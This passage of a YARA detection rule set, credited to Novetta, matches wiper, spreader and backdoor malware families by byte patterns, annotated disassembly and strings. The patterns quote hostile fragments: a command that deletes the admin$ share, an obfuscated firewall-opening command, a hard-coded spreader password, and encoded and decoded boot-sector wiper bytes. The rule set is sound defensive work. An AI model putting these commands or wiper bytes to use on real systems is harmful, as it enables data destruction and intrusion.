        $response or $connect in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// This rule has been modified by @mmorenog
// Original->$idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4]}
// Final -> $idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? }
import "pe"

rule RomeoGolf
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "7322d6b9328a9c708518c99b03a4ed3aa6ba943d7b439f6b1925e6d52a1828fe"
    strings:
        /*
        FF 15 70 80 01 10       call ds:GetTickCount
        50                      push eax                ; unsigned int
        E8 80 93 00 00          call _srand
        83 C4 04                add esp, 4
        E8 85 93 00 00          call _rand
        C1 E0 10                shl eax, 10h
        89 46 0C                mov [esi+0Ch], eax
        E8 7A 93 00 00          call _rand
        01 46 0C                add [esi+0Ch], eax
        E8 72 93 00 00          call _rand
        C1 E0 10                shl eax, 10h
        89 46 08                mov [esi+8], eax
        E8 67 93 00 00          call _rand
        01 46 08                add [esi+8], eax
        */
        // The trailing ?? ?? ?? is the @mmorenog modification noted above (three extra
        // wildcard bytes after the final call).
        $idGen = {FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? }
    condition:
        $idGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule RomeoHotel
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source_64 = "440cb3f6dd07e2f9e3d3614fd23d3863ecfc08b463b0b327eedf08504f838c90"
        Source_diskSpace = "1b1496f8f35d32a93c7f16ebff6e9b560a158cc6fce061491f91bc9f43ef5be4"
    strings:
        /*
        E8 D3 C7 00 00          call rand
        44 8B ED                mov r13d, ebp
        44 8B E0                mov r12d, eax
        B8 1F 85 EB 51          mov eax, 51EB851Fh
        48 8B FD                mov rdi, rbp
        41 F7 EC                imul r12d
        C1 FA 05                sar edx, 5
        8B CA                   mov ecx, edx
        C1 E9 1F                shr ecx, 1Fh
        03 D1                   add edx, ecx
        6B D2 64                imul edx, 64h
        44 2B E2                sub r12d, edx
        41 83 C4 3C             add r12d, 3Ch
        */
        // 64-bit variant: the 51EB851Fh multiplier, 64h and 3Ch constants are kept literal.
        $randBuff64 = {E8 [4] 44 [2] 44 [2] B? 1F 85 EB 51 48 [2] 41 [2] C1 ?? 05 8B ?? C1 ?? 1F 03 ?? 6B ?? 64 44 [2] 41 [2] 3C}
        /*
        FF 15 40 70 01 10       call ds:GetDiskFreeSpaceExA
        85 C0                   test eax, eax
        74 34                   jz short loc_10005072
        8B 84 24 20 01 00 00    mov eax, [esp+11Ch+arg_0]
        6A 00                   push 0
        99                      cdq
        68 00 00 10 00          push 100000h
        52                      push edx
        50                      push eax
        E8 4C 7C 00 00          call __allmul
        */
        $diskSpace = {FF 15 [4] 85 C0 74 ?? 8B [6] 6A 00 99 68 00 00 10 00 5? 5?
E8}
        $winst = "winsta0\\default" wide // this limits the overlap with RomeoGolf

    condition:
        // NOTE(review): both branches are anchored to a section literally named ".text".
        // pe.section_index() is undefined when no such section exists (packed or renamed
        // sections), so the range term is false and this rule stays silent on such samples.
        $randBuff64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or ($diskSpace in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) and $winst)
}

// rules specific to the winsec malware families

import "pe"

// Code-level signature: a GetTickCount()-derived value mixed with fixed constants
// (xor 1C40h, add 56E0h, xor 3230h). The constants carry the specificity; call targets
// and the mov-vs-push/pop variant between versions are wildcarded ([4] and [3-4]).
rule RomeoWhiskey_Two
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "a8d88714f0bc643e76163d1b8972565e78a159292d45a8218d0ad0754c8f561d"

    strings:
        /*
            FF 15 78 A2 00 10       call    GetTickCount_9
            66 8B C8                mov     cx, ax
            // the next op is a mov or a push/pop depending on the code version
            53                      push    ebx
            8F 45 F4                pop     dword ptr [ebp-0Ch]
            //or
            89 5D F4                mov     dword ptr [ebp+var_C], ebx
            66 81 F1 40 1C          xor     cx, 1C40h
            66 D1 E9                shr     cx, 1
            81 C1 E0 56 00 00       add     ecx, 56E0h
            0F B7 C9                movzx   ecx, cx
            0F B7 C0                movzx   eax, ax
            81 F1 30 32 00 00       xor     ecx, 3230h
            C1 E0 10                shl     eax, 10h
            0B C8                   or      ecx, eax
        */
        $a = {FF 15 [4] 66 8B C8 [3-4] 66 81 F1 40 1C 66 D1 E9 81 C1 E0 56 00 00 0F B7 C9 0F B7 C0 81 F1 30 32 00 00 C1 E0 10 0B C8 }

    condition:
        // Restricted to the raw ".text" section; undefined (never matches) if that section is absent.
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// Older variant of the same GetTickCount()-based value generation. The shift count and the
// 16-bit XOR constant are expected to change between builds and are wildcarded (?? / [2]);
// the pushes interleaved with the arithmetic are skipped with [2-4] and [0-2].
rule RomeoWhiskey_One
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "5d21e865d57e9798ac7c14a6ad09c4034d103f3ea993295dcdf8a208ea825ad7"

    strings:
        /*
            FF 15 D8 5B 00 10       call    GetTickCount_9
            0F B7 C0                movzx   eax, ax
            8B C8                   mov     ecx, eax
            // skipped: 6A 01       push    1               ; fDecode
            C1 E9 34                shr     ecx, 34h        <--- this value could change
            81 F1 C0 F3 00 00       xor     ecx, 0F3C0h     <--- this value could change
            // skipped: 6A 04       push    4               ; dwLength
            C1 E0 10                shl     eax, 10h
            0B C8                   or      ecx, eax
        */
        $a = { FF 15 [4] 0F B7 C0 8B C8 [2-4] C1 E9 ?? 81 F1 [2] 00 00 [0-2] C1 E0 10 0B C8 }

    condition:
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

// Two code signatures plus three strings. $connectTest is the non-blocking connect probe:
// ioctlsocket(FIONBIO = 8004667Eh), connect(), select() with a caller-supplied timeout,
// closesocket(). $maths is a rand()-based modulo computation. The strings point at the
// recdiscm32.exe dropper name and the admin-share style "\\%s\shared$\..." paths.
rule SierraAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "4d4b17ddbcf4ce397f76cf0a2e230c9d513b23065f746a5ee2de74f447be39b9.ex_"

    strings:
        /*
            8D 54 24 08             lea     edx, [esp+128h+argp]
            52                      push    edx             ; argp
            68 7E 66 04 80          push    8004667Eh       ; cmd
            56                      push    esi             ; s
            E8 DB 51 00 00          call    ioctlsocket
            8D 44 24 14             lea     eax, [esp+128h+name]
            6A 10                   push    10h             ; namelen
            50                      push    eax             ; name
            56                      push    esi             ; s
            E8 C8 51 00 00          call    connect
            8B 8C 24 34 01 00 00    mov     ecx, [esp+128h+dwTimeout]
            8D 54 24 0C             lea     edx, [esp+128h+timeout]
            52                      push    edx             ; timeout
            8D 44 24 28             lea     eax, [esp+12Ch+writefds]
            6A 00                   push    0               ; exceptfds
            50                      push    eax             ; writefds
            6A 00                   push    0               ; readfds
            6A 00                   push    0               ; nfds
            89 74 24 3C             mov     [esp+13Ch+writefds.fd_array], esi
            89 7C 24 38             mov     [esp+13Ch+writefds.fd_count], edi
            89 4C 24 20             mov     [esp+13Ch+timeout.tv_sec], ecx
            C7 44 24 24 00 00 00 00 mov     [esp+13Ch+timeout.tv_usec], 0
            E8 92 51 00 00          call    select
            33 C9                   xor     ecx, ecx
            56                      push    esi             ; s
            85 C0                   test    eax, eax
            0F 9F C1                setnle  cl
            8B F9                   mov     edi, ecx
            E8 7D 51 00 00          call    closesocket
        */
        $connectTest = {8D [3] 5? 68 7E 66 04 80 5? E8 [4] 8D [3] 6A 10 5? 5? E8 [4] 8B [6] 8D [3] 5? 8D [3] 6A 00 5? 6A 00 6A 00 89 [3] 89 [3] 89 [3] C7 [7] E8 [4] 33 ?? 5? 85 C0 0F 9F ?? 8B ?? E8}

        /*
            E8 D8 62 00 00          call    rand
            8B F8                   mov     edi, eax
            E8 D1 62 00 00          call    rand
            0F AF F8                imul    edi, eax
            E8 C9 62 00 00          call    rand
            0F AF C7                imul    eax, edi
            99                      cdq
            33 C2                   xor     eax, edx
            2B C2                   sub     eax, edx
            33 D2                   xor     edx, edx
            F7 F6                   div     esi
            8B FA                   mov     edi, edx
            57                      push    edi
            E8 05 13 00 00          call    sub_402BD0
        */
        $maths = { E8 [4] 8B ?? E8 [4] 0F AF ?? E8 [4] 0F AF ?? 99 33 ?? 2B ?? 33 ?? F7 ?? 8B ?? 5? E8}

        $s1 = "recdiscm32.exe"
        $s2 = "\\\\%s\\shared$\\syswow64"
        $s3 = "\\\\%s\\shared$\\system32"

    condition:
        // Either code signature inside ".text", or all three strings (the string branch still
        // works when the sample has no section named ".text").
        $connectTest in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $maths in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or 3 of ($s*)
}

// Brambul related signatures

import "pe"

// Code signature for the hand-built SMB_COM_NEGOTIATE packet (fixed field values written at
// fixed offsets of the packet buffer; the base register and up to 32 bytes between stores
// are wildcarded), or the hard-coded credential "iamsorry!@1234567" together with one of the
// obfuscated library/API name strings, all restricted to the ".data" section.
// NOTE(review): $lib and $api2 are the same string; either one alone is sufficient.
rule SierraBravo_Two
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        /*
            .text:00403D5A    mov     word ptr [esi+0Eh], 0C807h
            .text:00403D60    mov     dword ptr [esi+39h], 800000D4h
            .text:00403D67    mov     byte ptr [edi], 0Ch         <---- ignored
            .text:00403D6A    mov     word ptr [esi+25h], 0FFh
            .text:00403D70    mov     word ptr [esi+27h], 0A4h
            .text:00403D76    mov     word ptr [esi+29h], 4104h
            .text:00403D7C    mov     word ptr [esi+2Bh], 32h

            or

            .text:100036F9    mov     word ptr [ebx+0Eh], 0C807h
            ---- begin ignored -----
            .text:100036FF    rep movsd
            .text:10003701    lea     edi, [ebx+60h]
            .text:10003704    mov     ecx, 9
            .text:10003709    mov     esi, offset aWindows2000219 ; "windows 2000 2195"
            ---- end ignored -----
            .text:1000370E    mov     dword ptr [ebx+39h], 800000D4h
            .text:10003715    mov     word ptr [ebx+25h], 0FFh
            .text:1000371B    mov     word ptr [ebx+27h], 0A4h
            .text:10003721    mov     word ptr [ebx+29h], 4104h
            .text:10003727    mov     word ptr [ebx+2Bh], 32h
        */
        $smbComNegotiationPacketGen = { 66 C7 ?? 0E 07 C8 [0-32] C7 ?? 39 D4 00 00 80 [0-32] 66 C7 ?? 25 FF 00 [0-32] 66 C7 ?? 27 A4 00 [0-32] 66 C7 ?? 29 04 41 [0-32] 66 C7 ?? 2B 32 00}

        $lib = "!emCFgv7Xc8ItaVGN0bMf"
        $api1 = "!ctRHFEX5m9JnZdDfpK"
        $api2 = "!emCFgv7Xc8ItaVGN0bMf"
        $api3 = "!VWBeBxYx1nzrCkBLGQO"
        $pwd = "iamsorry!@1234567"

    condition:
        $smbComNegotiationPacketGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or (
            $pwd in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
            and (
                $lib in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
                or $api1 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
                or $api2 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
                or $api3 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
            )
        )
}

// Spreader socket setup: ioctlsocket(FIONBIO = 8004667Eh) followed by a 50 ms (32h) Sleep and
// a select() timeout of 3 seconds written into the stack frame. The stack displacements and
// the call target are wildcarded.
rule SierraBravo_One
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        /*
            .text:00402A65    push    8004667Eh                       ; cmd
            .text:00402A6A    push    esi                             ; s
            .text:00402A6B    call    ioctlsocket
            .text:00402A70    push    32h                             ; dwMilliseconds
            .text:00402A72    mov     [esp+24Ch+writefds.fd_array], esi
            .text:00402A79    mov     [esp+24Ch+writefds.fd_count], 1
            .text:00402A84    mov     [esp+24Ch+timeout.tv_sec], 3
            .text:00402A8C    mov     [esp+24Ch+timeout.tv_usec], 0
        */
        $spreaderSetup = {68 7E 66 04 80 5?
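E8 [4] 6A 32 89 B4 [5] C7 84 [5] 01 00 00 00 C7 44 [2] 03 00 00 00 C7 44 [2] 00 00 00 00 }

    condition:
        // Restricted to the raw ".text" section; undefined (never matches) if that section is absent.
        $spreaderSetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// String-only rule for the packed form: an admin$ share removal command, SMTP verbs and a
// section name ".petite" (presumably left by the Petite packer). Any three of the four.
rule SierraBravo_packed
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        $ = "cmd.exe /c \"net share admin$ /d\""
        $ = "MAIL FROM:<"
        $ = ".petite"
        $ = "Subject: %s|%s|%s"

    condition:
        3 of them
}

import "pe"

// Code signature around a DnsFree() call guarded by a null check, or two of three
// wmplog*.sqm artifact file names.
rule SierraCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin"

    strings:
        /*
            8B 0D 50 A7 56 00       mov     ecx, DnsFree
            81 F6 8C 3F 7C 5E       xor     esi, 5E7C3F8Ch
            6A 01                   push    1               ; _DWORD
            50                      push    eax             ; _DWORD
            85 C9                   test    ecx, ecx
            74 3A                   jz      short loc_40580B
            FF D1                   call    ecx ; DnsFree
        */
        // The mov operand (the absolute IAT slot address of one build, 0056A750h) and the jz
        // displacement are wildcarded so the pattern survives relinking, as the other code
        // signatures in this set do; the XOR constant 5E7C3F8Ch carries the specificity.
        $dnsResolve = { 8B 0D [4] 81 F6 8C 3F 7C 5E 6A 01 50 85 C9 74 ?? FF D1 }

        $file1 = "wmplog21t.sqm"
        $file2 = "wmplog15r.sqm"
        $file3 = "wmplog09c.sqm"

    condition:
        $dnsResolve in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or 2 of ($file*)
}

import "pe"

// Requires both the 16-byte communication key in ".data" and the handshake code in ".text":
// a 30000 ms (7530h) timeout send of a 4-byte value 1000h, then a 16-byte random buffer.
rule SierraJuliettMikeOne
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }

        /*
            .text:10001850    push    7530h                   ; dwTimeout
            .text:10001855    lea     eax, [esp+420h+a2]
            .text:10001859    push    4                       ; len
            .text:1000185B    push    eax                     ; a2
            .text:1000185C    push    esi                     ; s
            .text:1000185D    mov     dword ptr [esp+42Ch+a2], 1000h
            .text:10001865    call    CommSendWithTimeout
            .text:1000186A    add     esp, 14h
            .text:1000186D    cmp     eax, 0FFFFFFFFh
            .text:10001870    jz      loc_10001915
            .text:10001876    lea     ecx, [esp+418h+random]
            .text:1000187A    push    ecx                     ; a1
            .text:1000187B    call    Generate16ByteRandomBuffer
            .text:10001880    push    0                       ; fEncrypt
            .text:10001882    push    7530h                   ; dwTimeout
        */
        $handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }

    condition:
        $commKey in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))
        and $handshake in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

// Three independent code signatures (receive handler keyed on a 2733h length, a
// string-index based LoadLibraryA/GetProcAddress resolver, and a 4B0h-byte peer-list
// receive preceded by a 3000 ms Sleep) or the keylog file name format.
rule RomeoJuliettMikeTwo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c"

    strings:
        /*
            81 7C 24 24 33 27 00 00 cmp     [esp+1Ch+dwBytesToRead], 2733h
            75 7F                   jnz     short loc_10002B74
            8D 54 24 14             lea     edx, [esp+1Ch+var_8]
            52                      push    edx             ; Time
            FF 15 5C 11 02 10       call    ds:time
            8B 44 24 14             mov     eax, [esp+20h+var_C]
            83 C4 04                add     esp, 4
            8B C8                   mov     ecx, eax
            40                      inc     eax
            83 F9 64                cmp     ecx, 64h
        */
        $recvFunc = { 81 [3] 33 27 00 00 75 ?? 8D [3] 5? FF 15 [4] 8B [3] 83 ?? 04 8B ?? 4? 83 ?? 64 }

        /*
            E8 74 31 00 00          call    GetStringByIndex
            8B 7C 24 14             mov     edi, [esp+0Ch+dwFuncIndex]
            8B F0                   mov     esi, eax
            57                      push    edi             ; index
            E8 68 31 00 00          call    GetStringByIndex
            83 C4 08                add     esp, 8
            85 F6                   test    esi, esi
            74 21                   jz      short loc_10001040
            85 C0                   test    eax, eax
            74 1D                   jz      short loc_10001040
            56                      push    esi             ; lpLibFileName
            FF 15 2C 10 02 10       call    ds:LoadLibraryA
            57                      push    edi             ; index
            8B F0                   mov     esi, eax
            E8 4E 31 00 00          call    GetStringByIndex
            83 C4 04                add     esp, 4
            50                      push    eax             ; lpProcName
            56                      push    esi             ; hModule
            FF 15 5C 10 02 10       call    ds:GetProcAddress
        */
        $apiLoader = { E8 [4] 8B [3] 8B ?? 5? E8 [4] 83 C4 08 85 ?? 74 ?? 85 C0 74 ?? 5? FF 15 [4] 5? 8B ?? E8 [4] 83 C4 04 5? 5? FF 15 }

        /*
            68 B8 0B 00 00          push    0BB8h           ; dwMilliseconds
            FF 15 18 10 02 10       call    ds:Sleep
            6A 01                   push    1               ; dwTimeout
            8D 4C 24 10             lea     ecx, [esp+4C0h+peerEntries]
            68 B0 04 00 00          push    4B0h            ; dwBytesToRead
            51                      push    ecx             ; pvRecvBuffer
            8B CE                   mov     ecx, esi        ; this
            C7 44 24 14 B0 04 00 00 mov     [esp+4C8h+Memory], 4B0h
            E8 25 F4 FF FF          call    CClientConnection__RecvData
            83 F8 FF                cmp     eax, 0FFFFFFFFh
        */
        $recvPeers = { 68 B8 0B 00 00 FF 15 [4] 6A 01 [0-4] 68 B0 04 00 00 51 8B ?? [1-4] B0 04 00 00 E8 [4] 83 F8 FF }

        // Literal "%%" is matched as-is; YARA gives '%' no special meaning.
        $logFileName = "KBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT"

    condition:
        $recvFunc in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $apiLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $recvPeers in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $logFileName
}

// String-only rule: the split-up firewall command format (shared with firewallOpener /
// wiper_unique_strings) plus wide "*****[...]" status messages of a relay/port test.
// Any two strings fire, so $firewall alone is not enough.
rule TangoAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"

    strings:
        // $firewall is a shared code string
        $firewall = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
        $testStatus1 = "*****[Start Test -> %s:%d]" wide
        $testStatus2 = "*****[Relay Connect " wide
        $testStatus3 = "*****[Listen Port %d] - " wide
        $testStatus4 = "*****[Error Socket]" wide
        $testStatus5 = "*****[End Test]" wide

    condition:
        2 of them
}

import "pe"

// Loop over a table of 108h-byte entries calling strstr() on each until a match.
rule TangoBravo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "2aa9cd3a2db2bd9dbe5ee36d9a5fc42b50beca806f9d644f387d5a680a580896"

    strings:
        /*
            50                      push    eax             ; SubStr
            55                      push    ebp             ; Str
            FF D3                   call    ebx ; strstr
            83 C4 08                add     esp, 8
            85 C0                   test    eax, eax
            75 1A                   jnz     short loc_401131
            8A 8E 08 01 00 00       mov     cl, [esi+108h]
            81 C6 08 01 00 00       add     esi, 108h
            47                      inc     edi
            8B C6                   mov     eax, esi
            84 C9                   test    cl, cl
            75 E2                   jnz     short loc_40110C
        */
        $targetDomainCheck = {5? 5? FF ?? 83 C4 08 85 C0 75 ?? 8? ?? 08 01 00 00 8? ?? 08 01 00 00 4? 8B ?? 84 ?? 75 }

    condition:
        $targetDomainCheck in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

// Service teardown: ControlService(h, 1 = SERVICE_CONTROL_STOP, &status), spin until
// dwCurrentState == 1 (SERVICE_STOPPED), then DeleteService(h).
rule UniformAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "a24377681cf56c712e544af01ac8a5dbaa81d16851a17a147bbf5132890d7437"

    strings:
        /*
            8D 44 24 10             lea     eax, [esp+2Ch+ServiceStatus]
            50                      push    eax             ; lpServiceStatus
            6A 01                   push    1               ; dwControl
            56                      push    esi             ; hService
            FF D3                   call    ebx ; ControlService
            83 7C 24 14 01          cmp     [esp+2Ch+ServiceStatus.dwCurrentState], 1
            75 EF                   jnz     short loc_4010A5
            56                      push    esi             ; hService
            FF 15 08 70 40 00       call    ds:DeleteService
        */
        $stopDeleteService = {8D [3] 5? 6A 01 5? FF D? 83 [3] 01 75 ?? 5? FF 15}

    condition:
        $stopDeleteService in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// Self-cleanup: CloseServiceHandle, 3000 ms Sleep, directory creation and DeleteFileA on a
// fixed path, together with the "wauserv.dll" string (note the spelling: one letter short
// of the legitimate wuauserv.dll seen in AURIGA_driver_APT1 above) and "Rpcss". All three.
rule UniformJuliett
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "Cmd03000_1a6f62e1630d512c3b67bfdbff26270177585c82802ffa834b768ff47be0a008.bin"

    strings:
        /*
            56                      push    esi             ; hSCObject
            FF D5                   call    ebp ; CloseServiceHandle
            68 B8 0B 00 00          push    0BB8h           ; dwMilliseconds
            FF 15 38 70 40 00       call    ds:Sleep
            6A 00                   push    0               ; fCreateHighestLevel
            68 60 A9 40 00          push    offset PathName ; lpPathName
            E8 43 FE FF FF          call    RecursivelyCreateDirectories
            83 C4 08                add     esp, 8
            68 60 A9 40 00          push    offset PathName ; lpFileName
            FF 15 3C 70 40 00       call    ds:DeleteFileA
        */
        $a = {56 FF D5 68 B8 0B 00 00 FF 15 [4] 6A 00 68 [4] E8 [4] 83 C4 08 68 [4] FF 15}
        $ = "wauserv.dll"
        $ = "Rpcss"

    condition:
        all of them
}

import "pe"

// Wiper component: a 64 KiB (10000h) rand()-filled buffer, a disk-geometry structure
// filled with constants, the replacement boot sector (encoded and decoded), or the
// embedded license-key string. Any one of them is enough.
rule WhiskeyAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_"

    strings:
        /*
            E8 77 07 00 00          call    _rand
            B1 FB                   mov     cl, 0FBh
            F6 E9                   imul    cl
            88 44 34 08             mov     [esp+esi+10008h+randomData], al
            46                      inc     esi
            81 FE 00 00 01 00       cmp     esi, 10000h
            7C EA                   jl      short loc_402E8D
        */
        $randomBuffer = {E8 [4] B1 ?? F6 E9 88 [3] 4? 81 ?? 00 00 01 00 7C}

        /*
            89 58 09                mov     [eax+9], ebx
            C7 40 65 00 00 02 00    mov     dword ptr [eax+65h], 20000h
            C7 40 15 04 00 00 00    mov     dword ptr [eax+15h], 4
            C6 40 08 08             mov     byte ptr [eax+8], 8
            C7 40 04 00 02 00 00    mov     dword ptr [eax+4], 200h
            89 18                   mov     [eax], ebx
            89 58 0D                mov     [eax+0Dh], ebx
            C7 40 11 01 00 00 00    mov     dword ptr [eax+11h], 1
            89 58 69                mov     [eax+69h], ebx
            89 58 19                mov     [eax+19h], ebx
            B8 01 00 00 00          mov     eax, 1
        */
        $mbrDiskInfo = {89 ?? 09 C7 ?? 65 00 00 02 00 C7 ?? 15 04 00 00 00 C6 ?? 08 08 C7 ?? 04 00 02 00 00 89 ?? 89 ?? 0D C7 ?? 11 01 00 00 00 89 ?? 69 89 ?? 19 B8 01 00 00 00}

        // the replacement MBRs in both encoded (XOR 0x53) and decoded form
        // The decoded bytes read as 16-bit code: mov ah,43h / mov al,0 / int 13h (extended
        // sector write) looped over drives 80h..83h, bumping the LBA in the address packet
        // at 7C65h by 400h sectors per pass.
        $mbrReplacement_Decoded = { B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 }
        $mbrReplacement_Encoded = { E7 10 E3 53 9E 40 AD 91 D3 A9 D7 2F A0 E1 D3 EC 36 2F D2 56 53 57 D0 06 51 53 D0 06 57 53 }
        $licKey = "99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4F"

    condition:
        $licKey
        or $mbrReplacement_Decoded
        or $mbrReplacement_Encoded
        or $randomBuffer in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
        or $mbrDiskInfo in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

// This rule has been modified by @mmorenog @yararules to fix some syntax errors, it's not the original rule

import "pe"

// Document-extension filter: three consecutive _wcsnicmp()/wcscmp() comparisons of a file
// name against extensions, each followed by a jz to the same target, plus two of the
// extension strings as wide text.
rule WhiskeyBravo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "74eac0461c40316689ac2d598f606caa3965195b22f23d5acefeedfcdf056c5b"
        Source = "d079a266ed2a852c33cdac3df115d163ebbf2c8dae32d935e895cf8193163b13"

    strings:
        /*
            6A 04                   push    4               ; MaxCount   <--- this arg is not found in some variants (41bad..) as wcscmp is used instead
            68 08 82 00 10          push    offset Str2     ; ".doc"
            56                      push    esi             ; Str1
            FF D7                   call    edi ; _wcsnicmp <--- d07... variant uses a direct call instead
            83 C4 0C                add     esp, 0Ch        <--- when wcscmp is used, this is add esp, 8
            85 C0                   test    eax, eax
            0F 84 5B 02 00 00       jz      loc_100017D5
            6A 05                   push    5               ; MaxCount
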